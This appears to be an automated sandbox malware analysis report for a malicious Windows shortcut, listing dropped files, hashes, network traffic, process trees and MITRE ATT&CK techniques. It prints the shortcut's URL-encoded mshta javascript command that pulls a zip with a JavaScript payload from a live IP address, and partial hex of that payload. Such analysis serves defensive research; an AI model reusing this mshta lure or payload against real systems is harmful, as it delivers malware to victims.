Preview:	PK.........BY................reserva.txtPK.........BY................reserva/PK..........BYX.=.O...(.......reserva/Donejoao.js.Xko.W.=.+.?.T.%<..o#>8n.v..I.X.,.Mbc.#..+...;{.rw...R.Z.}..s............}..o...=...z.A...7..V\|..?..\|<.\~.....q..;....8.d.yt..D}...%Vz..w....:.c.h.bWP...\|...De....5...-l#..ecv+Ov...w....~......G.....g..U{.+x?./.~.c<.s9c..u.<......:[t.3e............v..P.;.....).O.p#\.......-..x..Np.=s.uI{.y6.;#L.s@......%q..5...DA..X.(.#.\.e,..p.?.w...z..a.<MS..Y8.!/.X..T..N."...R..u..d,..)G...{do.#x_.y.. ..13.Lnp:.....t:..@9...z...+a=....h...Z.\..2.....>...).U..J........ca...\........6.e...o....K=,.FO....a.]....}m_....... %_!n..y.....=}?".7....)..Zr.....3Y.#.-.<........f.uL...{..c..o.{.&>...........1....xc..-..X......:.w.L...W.aUM....^.2.]..$.M...1..KFR.\|.K......dfuj_.!...+.6.pdw.......d.....Y..1.zI....?.....yL.^..6g=.......+f.GF..&1....Ij..%...Lx...n{..G.W.\|V.....0.....s..#6........8..\.......(sf.p..l...Fb.'..kM.

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log

Download File

Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	89
Entropy (8bit):	4.554566022632337
Encrypted:	false
SSDEEP:	3:oVXR74HxFi8JOGXnB74HxFNLrFovn:o9qDiqaDNLOv
MD5:	20BBA2AE05B0279C1FA89EFB057DB3C6
SHA1:	8DF36792684086543DC8514E83D8D98867EDE270
SHA-256:	256D1059CD04CFBEEF1CAFDAB19EDA579E476EAB8503635BF1C97B54BDAF2D22
SHA-512:	5471FECE26ECEDA49E394AA6CB43589F9C2334A287A27197A16F49CF9C4E217EA8A0CD49594D7A5241E86F0FB8A9C3F97FB95C0FE99BDFD5AC8A40CAA678FDA0
Malicious:	false
Preview:	[2024/10/03 03:19:46.706] Latest deploy version: ..[2024/10/03 03:19:46.706] 11.381.2 ..

C:\Users\user\AppData\Local\Temp\~DF3A347E01C7E1A4F8.TMP

Download File

Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08023629288754439
Encrypted:	false
SSDEEP:	6:a/vllylvalyPSstMl3+tsMZlU1+yYpylADo1:i9l+atN0truOUT
MD5:	2DFBD9DE436BAB97A2850BC9A02D8017
SHA1:	70155D20DF8E334BF9CBEC7AC7AC3A19C805F1CE
SHA-256:	30595C648BE2A78D34826A31A251F554F0C5E3C005E5B29D1498473D9DD578D9
SHA-512:	F360FCED5F0CCE9E41747A438AD0B893D5FE62FB8CE0B898ECA55BDA8B5BE25C035D2DBDC4534805694B79321AC81522619609972E8B40D2AD1461B279DEFDF0
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF52B8A05B111B3DEB.TMP

Download File

Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.06905614974082831
Encrypted:	false
SSDEEP:	3:alFXEAUolllbll1nltllNlFlVlZmllol/Hflly7l8t5tXlRsltFll2/lsllM/llZ:a/vllLaluqh8tMl3+tsM6GKizuW1
MD5:	8F25D6E8A498DB4B4F5B95B35369A10E
SHA1:	742DC0DC6E0DC62696A1E3B00306175AF2E33412
SHA-256:	15B6B1CDFFA3DF1AC6887C9A7EEE83BB96961F6863A85A9F32C74863C302C17D
SHA-512:	0E144569A3B7D2B0CA235F8DDD7D22E596FDBB6FA488B64CA91B66794AA8FA772D6C6BB735C19A35E9F1F904A9EC38D0788726593429D0903CCB2063FA746927
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF9C40BA2442EF5D9D.TMP

Download File

Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.10418991085751793
Encrypted:	false
SSDEEP:	3:uKXk/2aRe8o0w++3KXRlU32o0w+s/lldlRsltFll2/lsllO5yDXB72rtl:FVxKBl+Btlql3+ts2wR70
MD5:	CE52AA046EFAB4C2E89808523718B7F5
SHA1:	8161F70B5577084CA02090DFA50537E44EA1BE93
SHA-256:	CB378EDFA2143486BEF4FA310C95ECB9ABDBC3019C5479CC6618AEBA0AABD6E9
SHA-512:	37A98761328C8702C21DDD706C6194966CE02170F52D7EBD55352BC4139B6C4145B351546216F65492686D13A5D80EAD692A5FC3BED7D068DDB7658BC219501D
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Sat May 8 07:14:46 2021, mtime=Sat May 8 07:14:46 2021, atime=Sat May 8 07:14:46 2021, length=32768, window=hidenormalshowminimized
Entropy (8bit):	4.477735140598256
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	aa.LnK.lnk
File size:	1'234 bytes
MD5:	c15e90f68dc8a127205072910f55ff41
SHA1:	079c39646eb91f4c24152943e5d18c285f6a53e5
SHA256:	342cdec573452a0280dda91354b37cb724e0fbde6744b2ce5d0d6872b8e6bed8
SHA512:	0991c8cc40d28d6da3642e946d310b5c96035f6305fa7b105be9c3821a97bacf0012735fe7df2f7f55b73b041930950c0763cdd23058421837f2ccfefe75192b
SSDEEP:	24:8GoIeDdPmZQYfgFi8AE4NFjUuUbCl6+/eB4qrA+QURcobmi4Wh4xOrV:8HIe5PmZDfgF0PpUu+mA4qc+QuyTH
TLSH:	A921891C0BE64755E2B68B3288E772208E35780BE9B19F1E01D0D68CBC15A41FC65F3A
File Content Preview:	L..................F.... ....>X5.C...>X5.C...>X5.C..........................;....P.O. .:i.....+00.../C:\...................V.1....."Y-...Windows.@........R.@"Y-...........................G.?.W.i.n.d.o.w.s.....Z.1.....3Y\...System32..B........R.@3Y\.......

File Icon


Icon Hash:	858db080828181ad

Static Windows Shortcut Info

General
Relative Path:	..\..\..\Windows\System32\mshta.exe
Command Line Argument:	"javascript:window.location.href='%68%74%74%70%73%3A%2F%2F%31%30%32%2E%31%36%35%2E%34%36%2E%31%34%35%2F';close();"
Icon location:

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:19:55.287894011 CEST	49723	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:55.287936926 CEST	443	49723	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:55.288007975 CEST	49723	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:55.289058924 CEST	49724	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:55.289107084 CEST	443	49724	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:55.289184093 CEST	49724	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:55.294229984 CEST	49723	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:55.294244051 CEST	443	49723	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:55.294346094 CEST	49724	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:55.294367075 CEST	443	49724	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:55.988456011 CEST	443	49723	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:55.988574028 CEST	49723	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:56.006948948 CEST	443	49724	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:56.007047892 CEST	49724	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:56.036732912 CEST	49723	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:56.036752939 CEST	443	49723	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:56.036863089 CEST	49724	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:56.036875010 CEST	443	49724	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:56.037053108 CEST	443	49723	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:56.037163019 CEST	49723	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:56.037640095 CEST	443	49724	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:56.037724972 CEST	49724	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:56.038964987 CEST	49723	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:56.083404064 CEST	443	49723	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:56.308552980 CEST	443	49723	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:56.308589935 CEST	443	49723	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:56.308643103 CEST	49723	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:56.308651924 CEST	443	49723	102.165.46.145	192.168.2.6
Oct 3, 2024 09:19:56.308974028 CEST	49723	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:56.310074091 CEST	49723	443	192.168.2.6	102.165.46.145
Oct 3, 2024 09:19:56.310096025 CEST	443	49723	102.165.46.145	192.168.2.6

HTTP Request Dependency Graph

102.165.46.145

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49723	102.165.46.145	443	1008	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:19:56 UTC	261	OUT	GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-CH User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: 102.165.46.145 Connection: Keep-Alive
2024-10-03 07:19:56 UTC	395	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:19:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Content-Description: File Transfer Cache-Control: no-cache, must-revalidate Expires: 0 Content-Disposition: attachment; filename="DocumentoRserva30513.zip" Content-Length: 2049 Pragma: public Connection: close Content-Type: application/octet-stream
2024-10-03 07:19:56 UTC	2049	IN	Data Raw: 50 4b 03 04 0a 00 00 00 00 00 d6 a9 42 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 72 65 73 65 72 76 61 2e 74 78 74 50 4b 03 04 0a 00 00 00 00 00 cb a9 42 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 72 65 73 65 72 76 61 2f 50 4b 03 04 14 00 00 00 08 00 93 ae 42 59 58 1c 3d 04 4f 06 00 00 28 17 00 00 13 00 00 00 72 65 73 65 72 76 61 2f 44 6f 6e 65 6a 6f 61 6f 2e 6a 73 b5 58 6b 6f 1a 57 10 3d 9f 2b f5 3f 10 54 89 25 3c cc 2e 6f 23 3e 38 6e de 76 d3 d4 b8 49 eb 58 11 2c 8b 4d 62 63 c2 23 c6 8d f2 2b fa 7f db 9e 3b 7b f7 72 77 c1 89 bd 52 b5 5a f0 7d cc 9c 99 73 e7 ce 0c fe f7 9f 1f f1 03 d4 fb 19 7d cc 90 c1 6f b8 c6 00 3d ec c9 ec 7a 94 41 97 af c3 37 8b 05 56 7c cb dc 3f c3 0e 2a 7c 3c 8e 5c 7e ba fc f6 e0 e9 71 9d ab 3b d8 c5 94 bb 17 38 a7 Data Ascii: PKBYreserva.txtPKBYreserva/PKBYX=O(reserva/Donejoao.jsXkoW=+?T%<.o#>8nvIX,Mbc#+;{rwRZ}s}o=zA7V\|?*\|<\~q;8

Target ID:	1
Start time:	03:19:40
Start date:	03/10/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\mshta.exe" "javascript:window.location.href='%68%74%74%70%73%3A%2F%2F%31%30%32%2E%31%36%35%2E%34%36%2E%31%34%35%2F';close();"
Imagebase:	0x7ff6d6090000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:19:43
Start date:	03/10/2024
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Imagebase:	0x7ff685ab0000
File size:	834'512 bytes
MD5 hash:	CFE2E6942AC1B72981B3105E22D3224E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:19:45
Start date:	03/10/2024
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17410 /prefetch:2
Imagebase:	0x580000
File size:	828'368 bytes
MD5 hash:	6F0F06D6AB125A99E43335427066A4A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:19:46
Start date:	03/10/2024
Path:	C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Wow64 process (32bit):	true
Commandline:	"C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
Imagebase:	0x7f0000
File size:	85'632 bytes
MD5 hash:	F9A898A606E7F5A1CD7CFFA8079253A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:19:49
Start date:	03/10/2024
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17414 /prefetch:2
Imagebase:	0x580000
File size:	828'368 bytes
MD5 hash:	6F0F06D6AB125A99E43335427066A4A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 00000149293A0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000003.2320817463.00000149293A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000149293A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_149293a0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 2e75a5284d54e4c4daeb650b75ef1062066b8bf6f854ed1a80bfc5d7cf103359
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 2D90021459540665D41411910C4569E5040A38D394FD445804426A0164D49E02961152

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report aa.LnK.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DC241724-8157-11EF-8C2D-ECF4BB2D2496}.dat

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC241726-8157-11EF-8C2D-ECF4BB2D2496}.dat

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC241728-8157-11EF-8C2D-ECF4BB2D2496}.dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\favicon[1].ico

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\DocumentoRserva30513[1].zip

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log

C:\Users\user\AppData\Local\Temp\~DF3A347E01C7E1A4F8.TMP

C:\Users\user\AppData\Local\Temp\~DF52B8A05B111B3DEB.TMP

C:\Users\user\AppData\Local\Temp\~DF9C40BA2442EF5D9D.TMP

Static File Info

General

File Icon

Static Windows Shortcut Info

General

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Windows Analysis Report
aa.LnK.lnk